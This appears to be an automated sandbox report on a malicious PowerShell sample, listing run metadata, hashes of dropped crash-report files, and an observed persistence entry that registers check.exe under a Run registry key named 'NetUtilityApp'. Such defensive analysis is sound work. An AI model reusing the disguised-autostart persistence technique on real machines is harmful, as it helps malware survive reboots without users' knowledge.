                                                                                                                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                            104.20.22.46
                                                                                                                                                                                                            nodejs.orgUnited States
                                                                                                                                                                                                            13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                            Analysis ID:1571745
                                                                                                                                                                                                            Start date and time:2024-12-09 17:09:41 +01:00
                                                                                                                                                                                                            Joe Sandbox product:CloudBasic
                                                                                                                                                                                                            Overall analysis duration:0h 14m 9s
                                                                                                                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                                                                                                                            Report type:full
                                                                                                                                                                                                            Cookbook file name:default.jbs
                                                                                                                                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                            Number of analysed new started processes analysed:37
                                                                                                                                                                                                            Number of new started drivers analysed:0
                                                                                                                                                                                                            Number of existing processes analysed:0
                                                                                                                                                                                                            Number of existing drivers analysed:0
                                                                                                                                                                                                            Number of injected processes analysed:0
                                                                                                                                                                                                            Technologies:
                                                                                                                                                                                                            • HCA enabled
                                                                                                                                                                                                            • EGA enabled
                                                                                                                                                                                                            • AMSI enabled
                                                                                                                                                                                                            Analysis Mode:default
                                                                                                                                                                                                            Analysis stop reason:Timeout
                                                                                                                                                                                                            Sample name:download.ps1
                                                                                                                                                                                                            Detection:MAL
                                                                                                                                                                                                            Classification:mal64.spyw.evad.winPS1@39/433@1/1
                                                                                                                                                                                                            EGA Information:
                                                                                                                                                                                                            • Successful, ratio: 75%
                                                                                                                                                                                                            HCA Information:Failed
                                                                                                                                                                                                            Cookbook Comments:
                                                                                                                                                                                                            • Found application associated with file extension: .ps1
                                                                                                                                                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                                                                                                                                                                                                            • Excluded IPs from analysis (whitelisted): 13.89.179.12, 13.107.246.63, 172.202.163.200, 20.190.177.85
                                                                                                                                                                                                            • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, time.windows.com, onedsblobprdcus17.centralus.cloudapp.azure.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                            • Execution Graph export aborted for target check.exe, PID 5112 because there are no executed function
                                                                                                                                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                            • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                            • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                                            • VT rate limit hit for: download.ps1
                                                                                                                                                                                                            TimeTypeDescription
                                                                                                                                                                                                            11:11:03API Interceptor44x Sleep call for process: powershell.exe modified
                                                                                                                                                                                                            11:11:23API Interceptor3x Sleep call for process: check.exe modified
                                                                                                                                                                                                            11:11:26API Interceptor3x Sleep call for process: WMIC.exe modified
                                                                                                                                                                                                            11:12:12API Interceptor3x Sleep call for process: WerFault.exe modified
                                                                                                                                                                                                            17:11:07AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run NetUtilityApp C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            17:11:16AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run NetUtilityApp C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            No context
                                                                                                                                                                                                            No context
                                                                                                                                                                                                            No context
                                                                                                                                                                                                            No context
                                                                                                                                                                                                            No context
                                                                                                                                                                                                            Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):65536
                                                                                                                                                                                                            Entropy (8bit):1.3771959687819026
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:p3cjI60i0PRjCjoRv888Z8Z8sr888W8G8v8K8t8i89Y8l8P8V8q8G8B/8A8J898S:5OIZpPRjCjs/wnWZRzuiFpY4lO8FX
                                                                                                                                                                                                            MD5:5FB725E1B378FE3E61FD7E9FDB77DF82
                                                                                                                                                                                                            SHA1:DB04482CC754CD930C8EF41CC25189760D2E1E79
                                                                                                                                                                                                            SHA-256:B6BC2A563B57FFE8CA743358A4E42B4332834E1093BFF0640DE5DDD751ED7640
                                                                                                                                                                                                            SHA-512:CE8758CA229B08C82976A383793249AAE041EE44D5893091BD6B488DEA98FDB04D6AA2821042D25D3C47CDFF0043C66C489DD72B4111AD24C6EC7D84339F6562
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.6.4.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.8.2.3.4.3.0.3.4.4.2.0.1.5.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.8.2.3.4.3.0.4.4.5.7.6.3.7.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.7.a.d.1.2.c.d.-.f.e.7.1.-.4.b.4.2.-.9.6.7.2.-.d.e.b.9.4.7.6.3.f.9.1.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.7.3.1.0.c.f.b.-.1.6.8.2.-.4.f.d.6.-.a.1.e.e.-.8.e.0.f.b.5.8.a.3.f.7.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.c.h.e.c.k...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.3.f.8.-.0.0.0.1.-.0.0.1.4.-.5.7.b.7.-.3.e.0.0.5.5.4.a.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.4.b.1.a.f.4.6.6.8.3.f.b.2.3.d.a.2.6.a.4.8.5.2.8.1.6.7.c.0.9.2.2.0.0.0.0.f.f.f.f.!.0.0.0.0.d.2.9.1.7.2.1.f.2.c.c.3.c.6.4.6.2.6.7.e.f.8.f.c.5.1.6.3.3.5.7.f.3.c.e.9.7.8.f.0.!.c.h.e.c.k...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.2././.0.9.:.0.9.:.5.4.:.4.7.!.2.4.f.
                                                                                                                                                                                                            Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):65536
                                                                                                                                                                                                            Entropy (8bit):1.3765956695073434
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:WCeIsi0PRjCjoRv8p8c8s8rr8R8X8f8u8d8N8O98f8A8e8o8T8f80/8N808I8X82:7eIspPRjCjcHwnBERzuiFpY4lO8FX
                                                                                                                                                                                                            MD5:070BA1B784BFD32CC219BD38EE5DDB76
                                                                                                                                                                                                            SHA1:EDF83C3DA51581955FDD8A46B461AAF7E565F84C
                                                                                                                                                                                                            SHA-256:A887B7751D224ECA66A571A8CC96E8D92418031440561D3A410E848DE79DB533
                                                                                                                                                                                                            SHA-512:BC346ED000374CA5C684D7A7F555CB27AD0E435EBDBB550D1C305620636E7F8BD81EF97C761536097D4AE6D62647B37BDCE64FCF8158061DACCECD79310B8DA8
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.6.4.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.8.2.3.4.3.0.9.0.3.1.9.2.6.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.8.2.3.4.3.0.9.7.0.3.8.2.8.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.f.4.3.9.6.4.f.-.5.5.d.4.-.4.1.d.0.-.8.8.1.9.-.2.5.1.0.e.3.7.7.e.e.0.8.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.4.7.c.0.f.6.c.-.0.1.4.7.-.4.a.a.6.-.8.1.d.a.-.d.9.c.6.8.9.a.a.6.1.f.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.c.h.e.c.k...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.b.8.-.0.0.0.1.-.0.0.1.4.-.e.d.9.3.-.2.4.0.6.5.5.4.a.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.4.b.1.a.f.4.6.6.8.3.f.b.2.3.d.a.2.6.a.4.8.5.2.8.1.6.7.c.0.9.2.2.0.0.0.0.f.f.f.f.!.0.0.0.0.d.2.9.1.7.2.1.f.2.c.c.3.c.6.4.6.2.6.7.e.f.8.f.c.5.1.6.3.3.5.7.f.3.c.e.9.7.8.f.0.!.c.h.e.c.k...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.2././.0.9.:.0.9.:.5.4.:.4.7.!.2.4.f.
                                                                                                                                                                                                            Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):65536
                                                                                                                                                                                                            Entropy (8bit):1.3775058903746857
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:ysPYIvi0PRjCjoRv8A8V818Yr8A8y8i8z8c8s8D9868p8T858O8C89/888F8B8y7:1PYIvpPRjCjcPwnCVRzuiFpY4lO8FX
                                                                                                                                                                                                            MD5:81A00C8B84B1DD9993D301D578EE30F0
                                                                                                                                                                                                            SHA1:69022253207BFA8B58E1E9E5B6BA2163321563CC
                                                                                                                                                                                                            SHA-256:57F1889F51E733EA428C74E0F7254C746CCFF7B5896B8C658E158D136430F1CC
                                                                                                                                                                                                            SHA-512:64C66963804112D68883D2FEA589F6AC5F182B8AD485F03C2EFFE4F1D478E3233721C3C011FB3FCAF8AB8DFFA16378E2C8EB357C1ADB467A9B2662E9927CA81C
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.6.4.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.8.2.3.4.2.9.5.6.7.3.4.1.5.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.8.2.3.4.2.9.6.8.2.9.6.6.1.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.2.7.8.1.5.6.f.-.b.a.7.3.-.4.1.2.3.-.9.2.b.0.-.5.8.b.7.3.f.a.f.d.0.8.9.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.b.8.8.3.a.0.3.-.a.2.2.6.-.4.1.4.e.-.a.8.9.9.-.7.b.8.f.9.4.6.b.9.9.0.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.c.h.e.c.k...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.f.7.c.-.0.0.0.1.-.0.0.1.4.-.0.b.6.8.-.4.9.f.9.5.4.4.a.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.4.b.1.a.f.4.6.6.8.3.f.b.2.3.d.a.2.6.a.4.8.5.2.8.1.6.7.c.0.9.2.2.0.0.0.0.f.f.f.f.!.0.0.0.0.d.2.9.1.7.2.1.f.2.c.c.3.c.6.4.6.2.6.7.e.f.8.f.c.5.1.6.3.3.5.7.f.3.c.e.9.7.8.f.0.!.c.h.e.c.k...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.2././.0.9.:.0.9.:.5.4.:.4.7.!.2.4.f.
                                                                                                                                                                                                            Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                            File Type:Mini DuMP crash report, 15 streams, Mon Dec 9 16:11:36 2024, 0x1205a4 type
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):133338
                                                                                                                                                                                                            Entropy (8bit):2.0456602058567137
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:sIOFEyWwurEilAQ6vQqeAV1o5Ey2j1Eke:2FE7GimV1op2ake
                                                                                                                                                                                                            MD5:1DEEF18C9315471AF0728905CB482D06
                                                                                                                                                                                                            SHA1:B35656E84DE9391D8CDC5E5775EED68077CB4A0E
                                                                                                                                                                                                            SHA-256:495D6A965C75D3FF7FFB97B03BEF3CAE6DA5A5B5BB2EAB4A9334660C472D621C
                                                                                                                                                                                                            SHA-512:23DA93857C6763091CE5238E93450A50594C6928CAFBBA8B9DF0AD22D74406E1F031BDC61B68819E8487CA063A1AFF4084249AB593D1E4ECCE521D12E4AC0594
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MDMP..a..... .........Wg............$............%..8.......$....-......$....\..........`.......8...........T............%..J............-.........../..............................................................................eJ......p0......Lw......................T.......|.....Wg.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):9608
                                                                                                                                                                                                            Entropy (8bit):3.707252292113214
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:R6l7wVeJZFxM6YSJElGgmfCypDG89b29HWqfnpym:R6lXJr66YcElGgmfCA25fn9
                                                                                                                                                                                                            MD5:417B1A54A9084D1373D69712E29DDA42
                                                                                                                                                                                                            SHA1:592EBB14B0E071A2C064B59A05365873BCA44B99
                                                                                                                                                                                                            SHA-256:5631CE543DC12E87AA93144A6B0F4D9021E870A092EC5E96FD650A09FBEFF2A8
                                                                                                                                                                                                            SHA-512:45C7BB055BB384A29AB4CBFD5B409764CA48834E368159E8490A454296C2DD1FCDA313C290C959CF93D5D2F3984A8DA50AD3CF7C70565CAD4B1F38152F5B5FD2
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.8.0.6.0.<./.P.i.
                                                                                                                                                                                                            Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4735
                                                                                                                                                                                                            Entropy (8bit):4.432835458768619
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:cvIwWl8zsHJg771I974WpW8VYpYm8M4JbWDFIyq8vuWweMZDQcS5d:uIjfpI7sx7VxJSqW3weMlC5d
                                                                                                                                                                                                            MD5:C664AD10AC50854FAE358DAAB4081A9E
                                                                                                                                                                                                            SHA1:2A626BEDD90C83DD539C26BDFF84A20955C82883
                                                                                                                                                                                                            SHA-256:7369F4C74688E8F26FC19FB66FA6363B433CA27B0FB275ADF5FAC4918056157D
                                                                                                                                                                                                            SHA-512:483C2AA05C15CF6A0E02D94FC64FD4848D8B479E9E5C86771AB5A46DE53E8B7465D40B754B5B57678AA9DBD44318D055034C8674A3A9FB4A5E070B2469F00D78
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="623954" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                            Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                            File Type:Mini DuMP crash report, 15 streams, Mon Dec 9 16:11:43 2024, 0x1205a4 type
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):133264
                                                                                                                                                                                                            Entropy (8bit):2.042633497366211
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:8IhBErurUiJ5QBRHbALCHF/QyImt8AOVwuTF1:JBEpi+ALAkEOVw61
                                                                                                                                                                                                            MD5:2D8C8A4CB700CC589442F0016ED68D9D
                                                                                                                                                                                                            SHA1:4813B4D9221BAE39529D2B0EFE4D7E74AF4D467F
                                                                                                                                                                                                            SHA-256:7D6480619D4093156EBD2469C12D19D984EED35FCB9CD2575A3F98069D37B475
                                                                                                                                                                                                            SHA-512:FC4B3DCAC45F88E92226A441C778026588FF289740A53E38E3915915B51E2192650256C657772D56F599E0599A51C6AE4D260181CABE3CE47DE4D84F547F3D48
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MDMP..a..... .........Wg............$............%..8.......$....-......D....\..........`.......8...........T............&...............-.........../..............................................................................eJ......p0......Lw......................T.............Wg............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):9256
                                                                                                                                                                                                            Entropy (8bit):3.7015563669490446
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:R6l7wVeJgnp6Ymy7bCgmfCypDq89b8rafQUm:R6lXJQp6YD7bCgmfC08mfy
                                                                                                                                                                                                            MD5:870808F6109B4DCD882EE3DE6F71032D
                                                                                                                                                                                                            SHA1:FDBC789949B765C446E67A212A84A8736805480A
                                                                                                                                                                                                            SHA-256:950CB4A386ED748AD290D950B4BD084C6B9A39A5A9DCBB6ACA15FC94673FFFAF
                                                                                                                                                                                                            SHA-512:8037748351AF4F787A816231496F27A5DAC07E3333B7905CC362ACEDBDFAFF9DDA9F1AB4B6211313D5574CC9D6FAD7230988849A94E46DD8841E29235A05865B
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.1.1.2.<./.P.i.
                                                                                                                                                                                                            Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4734
                                                                                                                                                                                                            Entropy (8bit):4.433570996694123
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:cvIwWl8zsHJg771I974WpW8VYYYm8M4JbWDF1pyq8vuWmNMZDQcSeEd:uIjfpI7sx7VwJSnpW3WMlC/d
                                                                                                                                                                                                            MD5:2539F60E356EB66D44225B1D0CB6F4DA
                                                                                                                                                                                                            SHA1:DCBA9116B42FFDE217F8A16E5062AAE80F83B541
                                                                                                                                                                                                            SHA-256:25098C82CFD3A44C7E298BFE492C2B40B92A845DCEC7FF47438FD7C6F1BAC2A3
                                                                                                                                                                                                            SHA-512:570AD78C480A120DC37C6F4258EAC5467A3178CCA9F14CD555CE7B2A0FF43116016FC70F56465531FF6FD8446D27CE46C34FD8094FE896EAB81022E9A6E1D51A
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="623954" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                            Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                            File Type:Mini DuMP crash report, 15 streams, Mon Dec 9 16:11:49 2024, 0x1205a4 type
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):135368
                                                                                                                                                                                                            Entropy (8bit):2.0074065021837333
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:UIP0IEVf6urEit5G3sPpKHFbAoohtIB5gWU5H:/0IE1Ui/Kl0dH
                                                                                                                                                                                                            MD5:D0B32675B748AD3D0B65B62DC8BD27AD
                                                                                                                                                                                                            SHA1:95A75652B71C008ADE04F89F9420092D6CD58AEC
                                                                                                                                                                                                            SHA-256:631019F5ABBAFCC85575065F51246075B9F21B402E9B63E888228CFEB919EFA5
                                                                                                                                                                                                            SHA-512:A4CB338D6FE8DC12E69AF1F526C932BB7A0454BA4F64B7357E929C43608988138E716D2176A68DB45677942BDD1BD5199F83108D350D11EE436074E0E52DC39E
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MDMP..a..... .........Wg............$............%..8.......$....-...........\..........`.......8...........T............&.. ............-.........../..............................................................................eJ......p0......Lw......................T.............Wg............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):9604
                                                                                                                                                                                                            Entropy (8bit):3.705173709475645
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:R6l7wVeJWqP6YRTArbzgmfCypDy89b24bf1vSm:R6lXJ7P6YlKbzgmfCU2Mf17
                                                                                                                                                                                                            MD5:89BA1274303986A4AA139A1763989BD9
                                                                                                                                                                                                            SHA1:E8C81527BBC0DD9D773C6B937AEA1FB87BA778B5
                                                                                                                                                                                                            SHA-256:CA0D716CB7254CCAE8CDD761942E2CEF4B675F9BACDDD464DD740BDC4B9FAD33
                                                                                                                                                                                                            SHA-512:EB2C484FAC212A7D2DE4F62BC1C8372F28623BDDF2C02BBA8AE388DB970934EA6D5B93A8E40093ABB9B91E721899BEB73D7CA7C5AAFC06B40C22B5E74289F825
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
